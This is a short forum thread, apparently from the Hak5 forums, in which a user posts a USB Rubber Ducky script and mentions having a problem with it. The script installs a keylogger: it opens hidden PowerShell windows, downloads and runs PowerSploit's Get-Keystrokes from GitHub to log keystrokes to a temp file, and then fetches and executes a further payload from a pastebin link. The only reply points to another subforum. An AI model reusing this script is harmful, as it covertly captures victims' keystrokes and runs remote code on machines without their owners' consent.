krifliox Posted May 29, 2019 Share Posted May 29, 2019 I have a problem I have a script for a usb rubber ducky to put a keylogger on the computer is this one: DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/KctzRsRH') ENTER Quote Link to comment Share on other sites More sharing options...
Rkiver Posted May 29, 2019 Share Posted May 29, 2019 https://forums.hak5.org/forum/56-usb-rubber-ducky/ Every device Hak5 makes has it's own section of the forums. Best post, and look, there. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.